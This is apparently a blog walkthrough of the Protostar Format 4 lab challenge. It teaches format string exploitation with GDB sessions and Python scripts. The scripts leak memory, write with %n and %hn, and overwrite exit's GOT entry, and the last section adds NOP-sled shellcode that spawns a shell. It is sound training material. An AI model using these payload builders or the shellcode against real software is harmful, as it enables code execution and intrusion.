Protostar Format 4 Walkthrough

Airman
Apr 22, 2018

Let’s tackle the Protostar Format 4 challenge from Exploit Exercises (https://exploit-exercises.com/protostar/format4/). This is a detailed step-by-step walkthrough explaining all the tools and techniques needed — we’ll be writing a format string exploit.

Format 4 Challenge

Here’s the source code for the challenge, format4.c:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];
  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);
  exit(1);
}

int main(int argc, char **argv)
{
  vuln();
}

The program reads a string from the standard input and passes it to printf. We need to craft a string that will cause a call to hello().

Exploring the Stack

The first thing we’ll do is explore the program’s stack at the point where printf is called. Let’s open format4 in GDB:

user@protostar:/opt/protostar/bin$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) set disassembly-flavor intel
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>info registers
>x/1i $eip
>x/32x $esp
>end
(gdb) set pagination off

To start with, I configure a few creature comforts so that GDB displays the registers, the current CPU instruction, and the contents of the stack each time a breakpoint is reached (as I finished writing I realized these are not really needed, but I left them here anyway). I explain these in a bit more detail in the Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0. Now let’s run it and play with the input:

(gdb) run
Starting program: /opt/protostar/bin/format4
ABCDEF
ABCDEF
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.
(gdb) run
Starting program: /opt/protostar/bin/format4
%p
0x200
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.
(gdb) run
Starting program: /opt/protostar/bin/format4
%p%p%p%p
0x2000xb7fd84200xbffff5f40x70257025
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.
(gdb) run
Starting program: /opt/protostar/bin/format4
AAAA|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p
AAAA|0x200|0xb7fd8420|0xbffff5f4|0x41414141|0x7c70257c|0x257c7025|0x70257c70|0x7c70257c|0x257c7025|0x70257c70
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.

Interesting. If we pass a plain string, we get the same string as output. If we use one of the printf format specifiers, such as %p, printf interprets it and expects an additional argument. No additional arguments are provided, but printf still picks values from the stack and uses them. %p tells printf to interpret the next argument as a 4-byte (on 32-bit systems) pointer (i.e. a memory address) and print it in hex. We add | as a divider, and also place the pattern AAAA at the beginning of the string so we can easily recognize it. The string we pass on stdin is located on the stack, so by instructing printf to walk the stack we found it: 0x41414141 (AAAA) is the fourth value printed. This makes sense, since buffer is a local variable in vuln() and so it is located on the stack during execution. See my Stack 7 walkthrough (link above) for more info on stack workings and layout.
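Spotting 0x41414141 by eye works fine here, but the same check is easy to script. The sketch below uses a hypothetical helper, find_offset, which is not part of the challenge or any library. It takes the |-separated output from the run above and returns the printf argument number that holds our marker:

```python
def find_offset(leak, marker='0x41414141', sep='|'):
    """Return the 1-based printf argument number whose %p output equals marker.

    Hypothetical helper: assumes the payload was 'AAAA' followed by '|%p'
    repeats, so the first |-separated field is the echoed 'AAAA' prefix.
    """
    fields = leak.strip().split(sep)[1:]   # drop the echoed 'AAAA'
    return fields.index(marker) + 1        # printf arguments are counted from 1


leak = ('AAAA|0x200|0xb7fd8420|0xbffff5f4|0x41414141|0x7c70257c'
        '|0x257c7025|0x70257c70|0x7c70257c|0x257c7025|0x70257c70')
print(find_offset(leak))   # 4
```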

Reading Arbitrary Program Memory

OK, let’s start crafting our exploit, and we’ll start with exploring the program memory:

#!/usr/bin/python
import struct

buf = ''
buf += 'AAAA'
buf += '|%p'*10
print(buf)

Our starting point is the same string we used before. Run the exploit:

user@protostar:~$ ./format4.py >/tmp/f4

Back in GDB:

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
AAAA|0x200|0xb7fd8420|0xbffff5f4|0x41414141|0x7c70257c|0x257c7025|0x70257c70|0x7c70257c|0x257c7025|0x70257c70
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.

We see that the beginning of the string can be found on the stack in the fourth “parameter” to printf. Let’s find a string in memory we’d like to display:

(gdb) disas hello
Dump of assembler code for function hello:
0x080484b4 <hello+0>: push ebp
0x080484b5 <hello+1>: mov ebp,esp
0x080484b7 <hello+3>: sub esp,0x18
0x080484ba <hello+6>: mov DWORD PTR [esp],0x80485f0
0x080484c1 <hello+13>: call 0x80483dc <puts@plt>
0x080484c6 <hello+18>: mov DWORD PTR [esp],0x1
0x080484cd <hello+25>: call 0x80483bc <_exit@plt>
End of assembler dump.
(gdb) x/s 0x80485f0
0x80485f0: "code execution redirected! you win"

We see that the memory at address 0x80485f0 contains the string “code execution redirected! you win”. Let’s trick the program into displaying it! All we need to do is replace AAAA with the address of the string and change the fourth %p to %s. The address we provide will then be interpreted as the location of a null-terminated string, which will be printed. Here’s the modified exploit:

#!/usr/bin/python
import struct

buf = ''
buf += struct.pack('I', 0x80485f0)
buf += '|%p'*3
buf += '|%s'
buf += '|%p'*6
print(buf)

And now run it (run the exploit first and redirect output to /tmp/f4):

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
|0x200|0xb7fd8420|0xbffff5f4|code execution redirected! you win|0x7c70257c|0x257c7025|0x73257c70|0x7c70257c|0x257c7025|0x70257c70
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.

It works!
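The payload works for any readable address. Below is a Python 3 sketch that rebuilds the same bytes for an arbitrary address and stack position; leak_payload is a hypothetical name. It returns bytes because struct.pack returns bytes in Python 3, unlike the Python 2 strings used in the scripts above.

```python
import struct

def leak_payload(addr, arg_index, total=10):
    """Build a format string that prints the NUL-terminated string at addr.

    Assumes the first 4 bytes of the input land at printf argument arg_index
    (4 for format4 in the runs above). Caveat: a 0x00 byte in addr ends the
    format string early, and a 0x0a byte makes fgets stop reading early.
    """
    buf = struct.pack('<I', addr)             # little-endian 32-bit address
    buf += b'|%p' * (arg_index - 1)           # step over the earlier arguments
    buf += b'|%s'                             # dereference our planted address
    buf += b'|%p' * (total - arg_index)       # a few more values for context
    return buf
```

With sys.stdout.buffer.write(leak_payload(0x80485f0, 4) + b'\n') it should emit the same bytes as the script above, where print adds the trailing newline.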

Modifying Memory With printf

So far so good, but we have only learned how to read the contents of memory. How is it even possible to hijack the execution flow of the program with printf? Doesn’t it just print stuff to the standard output? If we check the man page for printf (the C function, not the shell command, i.e. man 3 printf), we find this gem in the BUGS section:

Code such as printf(foo); often indicates a bug, since foo may contain a % character. If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.

“Write to memory” sounds promising, let’s check what %n does:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

So, printf("AAAA%n", &n_char) will print AAAA to the standard output and then store 4 in the n_char variable. Because we control the stack contents through the standard input, we can supply any memory address in place of &n_char. Excellent!
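To check this kind of arithmetic without a debugger, here’s a deliberately simplified Python model of printf. It is an illustration, not glibc. It only understands %p, %n and %hn with an optional field width and N$ position, treats every other byte as one printed character, and records %n writes in a dict instead of real memory. The names simulate_printf and SPEC are made up for this sketch.

```python
import re

# Hypothetical toy model: %[N$][width][h](p|n) only; everything else is literal.
SPEC = re.compile(rb'%(?:(\d+)\$)?(\d*)(h?)([pn])')

def simulate_printf(fmt, args):
    """Return (characters printed, {address: value written by %n/%hn})."""
    memory = {}
    count = 0        # characters "printed" so far
    next_arg = 0     # index of the next sequential (non-positional) argument
    pos = 0
    while pos < len(fmt):
        m = SPEC.match(fmt, pos)
        if m is None:
            count += 1            # ordinary byte, printed as-is
            pos += 1
            continue
        position, width, half, conv = m.groups()
        if position:
            value = args[int(position) - 1]   # %N$ picks argument N directly
        else:
            value = args[next_arg]
            next_arg += 1
        if conv == b'p':
            text = '0x%x' % value if value else '(nil)'
            count += max(len(text), int(width or 0))   # width pads with spaces
        elif half:
            memory[value] = count & 0xffff            # %hn stores a short
        else:
            memory[value] = count & 0xffffffff        # %n stores an int
        pos = m.end()
    return count, memory


count, mem = simulate_printf(b'AAAA%n', [0x1000])
print(count, mem)   # 4 {4096: 4}
```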

Let’s try to write 0x41 to the target variable. Find its memory address first:

(gdb) break main
Breakpoint 10 at 0x804851a: file format4/format4.c, line 27.
(gdb) run
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xd63131a5 -701419099
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xfc66e7b5 0xd63131a5 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4
Breakpoint 10, main (argc=1, argv=0xbffff874) at format4/format4.c:27
27 in format4/format4.c
(gdb) p target
$9 = 0
(gdb) p &target
$10 = (int *) 0x804973c

We see that the value of target is 0 and that it’s located at 0x804973c. Let’s use it:

#!/usr/bin/python
import struct

buf = ''
buf += struct.pack('I', 0x804973c)
buf += '|%p|'*3
# junk to make printf output 0x41 characters
buf += 'A'*(0x41-len(buf))
# this is where printf will write 0x41 to 0x804973c (target)
buf += '%n'
print(buf)

Run it in GDB (remember to run the script first and save its output to /tmp/f4):

(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) break *0x0804850f
Breakpoint 11 at 0x804850f: file format4/format4.c, line 22.
(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0x1cbc0fd9 482086873
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0x36ebd9c9 0x1cbc0fd9 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4
Breakpoint 10, main (argc=1, argv=0xbffff874) at format4/format4.c:27
27 in format4/format4.c
(gdb) p target
$11 = 0
(gdb) c
Continuing.
<|0x200||0xb7fd8420||0xbffff5f4|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
eax 0x55 85
ecx 0x0 0
edx 0xb7fd9340 -1208118464
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff5a0 0xbffff5a0
ebp 0xbffff7b8 0xbffff7b8
esi 0x0 0
edi 0x0 0
eip 0x804850f 0x804850f <vuln+61>
eflags 0x200292 [ AF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804850f <vuln+61>: call 0x80483ec <exit@plt>
0xbffff5a0: 0x00000001 0x00000200 0xb7fd8420 0xbffff5f4
0xbffff5b0: 0x0804973c 0x7c70257c 0x7c70257c 0x7c70257c
0xbffff5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5f0: 0x0a6e2541 0xb7ffef00 0xb7fed24f 0xb7ffe000
0xbffff600: 0x00001000 0x00000001 0xb7ffeff4 0x00000000
0xbffff610: 0xbffff6bc 0xb7fed61f 0xb7fffab0 0xb7fe1d68
Breakpoint 11, 0x0804850f in vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) p target
$12 = 84
(gdb) p/x target
$13 = 0x54

We set a second breakpoint in vuln on the call to exit(), right after printf, and start the program. At the beginning of main the value of target is 0. After printf it is 0x54. The good news is that we’ve managed to change it. The bad news is that it’s not the expected 0x41. What happened here is that we used the length of the format string in our calculations, but printf replaces each %p with a hex value (like 0xb7fd8420), so it prints more characters than the string itself contains.
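The numbers add up. Here’s the character count printf produced for this payload, recomputed in Python from the values it leaked in the output above:

```python
# Values printf printed for the three %p conversions (copied from the run above)
leaked = ['0x200', '0xb7fd8420', '0xbffff5f4']

address_bytes = 4                          # the packed target address is printed too
padding = 0x41 - (4 + len('|%p|') * 3)     # 'A's the script added, based on the format length
expanded = sum(len('|' + v + '|') for v in leaked)  # what '|%p|' x3 really printed

printed = address_bytes + expanded + padding
print(padding, printed, hex(printed))      # 49 84 0x54
```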

This brings us to the first trick we’ll use: the parameter field (argument position) modifier. It lets a conversion reference a specific printf argument without consuming the ones before it: printf("%4$d", 1, 2, 3, 4, 5) will print 4. This is just what we need to reference the memory address we plant on the stack without using a series of %p to step over the stack values we don’t need. Here’s our modified exploit to overwrite target:

#!/usr/bin/python
import struct

buf = ''
buf += struct.pack('I', 0x804973c)
# junk to make printf output 0x41 characters
buf += 'A'*(0x41-len(buf))
# this is where printf will write 0x41 to 0x804973c (target)
buf += '%4$n'
print(buf)

And run it in GDB:

(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xdb1dea4c -618796468
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xf14a3c5c 0xdb1dea4c 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4
Breakpoint 10, main (argc=1, argv=0xbffff874) at format4/format4.c:27
27 in format4/format4.c
(gdb) p target
$14 = 0
(gdb) c
Continuing.
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
eax 0x42 66
ecx 0x1 1
edx 0xb7fd9340 -1208118464
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff5a0 0xbffff5a0
ebp 0xbffff7b8 0xbffff7b8
esi 0x0 0
edi 0x0 0
eip 0x804850f 0x804850f <vuln+61>
eflags 0x200292 [ AF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804850f <vuln+61>: call 0x80483ec <exit@plt>
0xbffff5a0: 0x00000001 0x00000200 0xb7fd8420 0xbffff5f4
0xbffff5b0: 0x0804973c 0x41414141 0x41414141 0x41414141
0xbffff5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5f0: 0x24342541 0xb7000a6e 0xb7fed24f 0xb7ffe000
0xbffff600: 0x00001000 0x00000001 0xb7ffeff4 0x00000000
0xbffff610: 0xbffff6bc 0xb7fed61f 0xb7fffab0 0xb7fe1d68
Breakpoint 11, 0x0804850f in vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) p/x target
$16 = 0x41

It works perfectly now.
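For reuse, the working payload can be wrapped in a function. This is a Python 3 sketch, and single_write_payload is a hypothetical name. It assumes the input’s first 4 bytes show up as printf argument arg_index, as they did here with %4$n. It only handles values of at least 4, because the address itself is already printed.

```python
import struct

def single_write_payload(addr, value, arg_index):
    """Build input that makes printf store `value` at `addr` via %N$n."""
    head = struct.pack('<I', addr)            # printed as 4 raw characters
    if value < len(head):
        raise ValueError('value must be at least %d' % len(head))
    padding = b'A' * (value - len(head))      # bring the printed count up to value
    return head + padding + b'%%%d$n' % arg_index   # e.g. b'%4$n'


payload = single_write_payload(0x804973c, 0x41, 4)
print(len(payload), payload[-4:])   # 69 b'%4$n'
```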

The second trick we’ll need for this exploit is the “length modifier” for printf conversions. If we wanted to write, say, 0x0804abcd to some memory address using %n, we would need to print 134,523,853 characters (converted from hex). That’s a lot! But if we use %hn instead, printf treats the argument as a pointer to a short int, i.e. it writes only 2 bytes. So instead of doing one write of 0x0804abcd, we can do two separate writes of 0x0804 and 0xabcd, for which printf needs to output at most 43,981 characters (0xabcd in decimal). Also, the buffer is only 512 bytes long, so we cannot just pass a long string to output all of those characters. Instead we’ll use the field width modifier (a number we can put right after %). As an example, printf("%500d", 5) will print 499 spaces followed by the number 5, 500 characters in all.
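Here is a quick Python check of the arithmetic above. It is only arithmetic, but it also shows that Python’s %-formatting applies a field width the same way C’s printf does in this simple case:

```python
value = 0x0804abcd
print(value)                           # 134523853 characters for one %n write

high, low = value >> 16, value & 0xffff
print(hex(high), hex(low), low)        # 0x804 0xabcd 43981

# Field width: pad the converted value with spaces up to 500 characters
padded = '%500d' % 5
print(len(padded), padded.count(' '))  # 500 499
```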

We also notice that exit() is called right after printf() in vuln(), so vuln() never returns and overwriting its return address would be useless. Our third trick, then, is to overwrite the address of exit() in the Global Offset Table (GOT). This also makes the exploit more reliable, because we don’t need to guess the correct location of the return address on the stack. See my Heap 3 walkthrough for more info on the GOT: https://medium.com/@airman604/protostar-heap-3-walkthrough-56d9334bcd13

The Exploit

Our plan is clear now. We’ll use the input string to plant the addresses of the high and low halves of exit’s GOT entry, print the required number of characters, and use %hn twice to overwrite the address of exit in the GOT with the address of hello().

Let’s find all the needed addresses:

(gdb) p hello
$17 = {void (void)} 0x80484b4 <hello>
(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) x/3i 0x80483ec
0x80483ec <exit@plt>: jmp DWORD PTR ds:0x8049724
0x80483f2 <exit@plt+6>: push 0x30
0x80483f7 <exit@plt+11>: jmp 0x804837c
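The GOT slot can also be read straight from the instruction bytes. For a stub like this one, the first instruction is encoded as ff 25 followed by the absolute 32-bit address of the GOT slot in little-endian order. The bytes below are assumed from that encoding rather than dumped from the binary; in GDB, x/6xb 0x80483ec would show the real ones. got_slot_from_plt is a hypothetical helper:

```python
import struct

# ASSUMPTION: standard i386 encoding of "jmp DWORD PTR ds:0x8049724",
# i.e. opcode ff, ModRM 0x25 (absolute disp32), then the address little-endian.
plt_stub = bytes.fromhex('ff2524970408')

def got_slot_from_plt(stub):
    """Return the GOT address an i386 'jmp [disp32]' PLT stub jumps through."""
    if stub[:2] != b'\xff\x25':
        raise ValueError('not a jmp DWORD PTR [disp32] instruction')
    return struct.unpack('<I', stub[2:6])[0]

print(hex(got_slot_from_plt(plt_stub)))   # 0x8049724
```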

So we need to overwrite the memory at 0x08049724 with 0x080484b4. Let’s put it all together:

#!/usr/bin/python
import struct

got_exit = 0x8049724
got_exit_high = got_exit + 2
hello = 0x080484b4
hello_low = hello & 0xffff
hello_high = hello >> 16

buf = ''
buf += struct.pack('I', got_exit_high)
buf += struct.pack('I', got_exit)
# write the high part first
# we already wrote 8 bytes - the 2 memory addresses
buf += '%2044p' # 0x804-8 = 2044
buf += '%4$hn'
# write the low part now
buf += '%31920p' # 0x84b4-0x804 = 31920
buf += '%5$hn'
print(buf)

And it works when we run it as:

user@protostar:/opt/protostar/bin$ ~/format4.py | ./format4
&$
<snip>
code execution redirected! you win
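The width arithmetic in this script only works because the high half (0x0804) is smaller than the low half (0x84b4), so it can be written first. Below is a Python 3 generalization; hn_payload is a hypothetical name. It orders the two %hn writes by value and assumes, as above, that the input begins at printf argument arg_index. It refuses widths under 10, because %p’s own output can be that long and would then exceed the field width. It also rejects equal halves.

```python
import struct

def hn_payload(where, what, arg_index):
    """Build input that writes the 32-bit value `what` to `where` with two %hn.

    Assumes the first 4 input bytes are printf argument arg_index (4 in format4).
    """
    # (address, 16-bit half) pairs, smaller half first so each width is positive
    writes = sorted([(where + 2, what >> 16), (where, what & 0xffff)],
                    key=lambda w: w[1])
    buf = b''.join(struct.pack('<I', addr) for addr, _ in writes)
    printed = len(buf)                       # the 8 address bytes are printed too
    for i, (_, half) in enumerate(writes):
        width = half - printed
        if width < 10:                       # %p itself may print up to 10 chars
            raise ValueError('value too small for this simple layout')
        buf += b'%%%dp%%%d$hn' % (width, arg_index + i)
        printed = half                       # printf has now output `half` chars
    return buf


payload = hn_payload(0x8049724, 0x080484b4, 4)
print(payload[8:])   # b'%2044p%4$hn%31920p%5$hn'
```

In Python 3, the payload would be emitted with sys.stdout.buffer.write(payload + b'\n'), since print() would show the bytes’ repr instead of the raw bytes.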

Where’s My Shellz?

Without much explanation, here’s a modified exploit that executes a shell. 0xbffff5d0 is approximately the address of the NOPs (\x90) we add to the buffer. We try to jump to about the middle of the nopsled, from where execution slides into the shellcode I’ve also added:

#!/usr/bin/python
import struct

got_exit = 0x8049724
got_exit_high = got_exit + 2
# hello = 0x080484b4
hello = 0xbffff5d0 + 200
hello_low = hello & 0xffff
hello_high = hello >> 16

buf = ''
buf += struct.pack('I', got_exit_high)
buf += struct.pack('I', got_exit)
# write the high part first
# we already wrote 8 bytes - the 2 memory addresses
buf += '%' + str(hello_high-len(buf)) + 'p'
buf += '%4$hn'
# write the low part now
buf += '%' + str(hello_low-hello_high) + 'p'
buf += '%5$hn'
buf += '\x90'*300
buf += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
buf += "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
print(buf)

This should be executed as:

user@protostar:/opt/protostar/bin$ (~/format4_shell.py; cat) | ./format4

For more info on nopsled and the (…; cat) | … trick, see my Stack 7 walkthrough.
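Where does 0xbffff5d0 come from? Under GDB, the earlier runs showed ebp = 0xbffff7b8 inside vuln() and buffer at ebp-0x208, i.e. 0xbffff5b0. Adding the length of everything placed in front of the NOPs lands right on 0xbffff5d0. Here is a short Python check under that assumption. Outside GDB the environment, and therefore the stack, usually shifts a little, and that is what the sled absorbs.

```python
# ASSUMPTION: addresses from the GDB session above. Inside vuln(), ebp was
# 0xbffff7b8 and buffer lives at ebp-0x208; outside GDB the stack usually shifts.
buffer_addr = 0xbffff7b8 - 0x208          # 0xbffff5b0
target = 0xbffff5d0 + 200                 # the value the script calls `hello`
high, low = target >> 16, target & 0xffff

# Same format specifiers the shell script generates (two addresses come first)
fmt = b'%%%dp%%4$hn%%%dp%%5$hn' % (high - 8, low - high)
prefix_len = 8 + len(fmt)                  # bytes in front of the NOP sled
sled_start = buffer_addr + prefix_len
sled_end = sled_start + 300                # the script adds 300 NOPs

print(hex(sled_start), sled_start <= target < sled_end)   # 0xbffff5d0 True
```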

References

LiveOverflow Binary Hacking course — https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN

My Protostar Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0
